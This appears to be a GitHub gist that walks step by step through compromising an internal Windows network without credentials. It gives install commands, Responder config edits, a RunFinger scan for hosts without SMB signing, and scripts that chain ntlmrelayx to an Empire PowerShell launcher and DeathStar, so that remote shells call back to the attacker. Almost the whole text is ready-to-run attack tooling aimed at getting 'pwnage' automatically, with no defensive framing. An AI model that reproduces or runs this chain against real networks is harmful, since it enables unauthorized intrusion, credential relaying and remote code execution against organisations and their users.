Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Pwning internal networks automagically

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .

However, if I install other tools like Empire first, then the impacket install complains about not being able to install/uninstall the updated version. In raising this issue it looks like the way to handle that is:

sudo apt-get remove python-impacket
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .

However, by doing that it rips out a bunch of other packages, so then you have to reinstall them with something like:

apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y

So long story short: handle the ntlmrelayx install with care.

Download and install Empire

git clone https://github.com/EmpireProject/Empire.git /opt/empire
cd /opt/empire
./setup/install.sh

Download Deathstar

git clone https://github.com/byt3bl33d3r/DeathStar.git /opt/deathstar

Download responder

git clone https://github.com/lgandx/Responder.git /opt/responder

Now open /opt/responder/Responder.conf and turn SMB and HTTP to off:

[Responder Core]

; Servers to start
SQL = On
SMB = Off <-- it's usually "On" so change to "Off"
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off <-- it's usually "On" so change to "Off"
HTTPS = On
DNS = On
LDAP = On

Create list of targets that have SMB signing disabled:

mkdir /scripts
cd /scripts
/opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

The resulting targets.txt should have a list of IPs with SMB signing disabled:

192.168.55.36
192.168.55.144
192.168.55.199
...

Create batch of scripts so you're ready to automate the pwnage!

sudo mkdir /scripts
cd /scripts
sudo echo "cd /opt/empire" > empire.sh
sudo echo "sudo ./empire --rest --username empireadmin --password Password123" >> empire.sh
sudo echo "sudo /opt/deathstar/DeathStar.py --listener-ip YOUR.IP -t 100" > deathstar.sh
sudo echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." > ntlmrelayx.sh
sudo echo "sudo python /opt/impacket/examples/ntlmrelayx.py -tf targets.txt -c 'YOUR.POWERSHELL'" >> ntlmrelayx.sh
sudo echo "sudo python /opt/responder/Responder.py -I YOUR-LAN-INTERFACE -r -d -v" > responder.sh

Now open up all the scripts created in /scripts and adjust as necessary. Note: you won't be able to totally fill in the necessary info for empire.sh just yet, so wait until you proceed to the next section:

Set all scripts as executable

cd /scripts
chmod +x deathstar.sh
chmod +x empire.sh
chmod +x ntlmrelayx.sh
chmod +x responder.sh

Run Empire

Get Empire running in a screen session:

cd /scripts
screen -S empire -dm -L /scripts/empire.sh

Run DeathStar

Get DeathStar running in a screen session:

screen -S deathstar -dm /scripts/deathstar.sh

Get Empire PowerShell code for ntlmrelayx.sh

Connect to the Empire screen session

screen -R empire

At the empire prompt, run these commands to get the DeathStar PowerShell code:

listeners
launcher powershell DeathStar

Now press Ctrl+A and then D to exit the screen session. In /scripts there should be a screenlog.0 file, which is a log file of everything happening in the Empire screen session. Do a cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==

Next, open /scripts/ntlmrelayx.sh and where you see YOUR-POWERSHELL paste the PowerShell that you got in the previous steps. Remember that in this script, there's a tick at the start of powershell and then a closing tick at the end of your PowerShell code.

Launch ntlmrelayx.sh

Run a new screen session with ntlmrelayx:

screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh

Note: you might find that when running ntlmrelayx.sh the console barfs up some weird error like:

Traceback (most recent call last):
  File "examples/ntlmrelayx.py", line 45, in <module>
    from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/__init__.py", line 1, in <module>
    from httprelayserver import HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 27, in <module>
    from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/__init__.py", line 3, in <module>
    from ldaprelayclient import LDAPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 17, in <module>
    from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS

If that happens, you may need to rip and replace your version of impacket. See the section above where I address this, as well as the GitHub issue here that should help you.

Launch Responder

Run a new screen session with Responder:

screen -S responder -dm /scripts/responder.sh

Keep an eye on Empire and DeathStar screen sessions to watch the shells come pouring in:

screen -R empire
screen -R deathstar

Have fun :-)

Quick start for next time

Put the following commands in a file called /scripts/pwn.sh

screen -S empire -dm -L /scripts/empire.sh
screen -S deathstar -dm /scripts/deathstar.sh
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
screen -S responder -dm /scripts/responder.sh

Resources:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.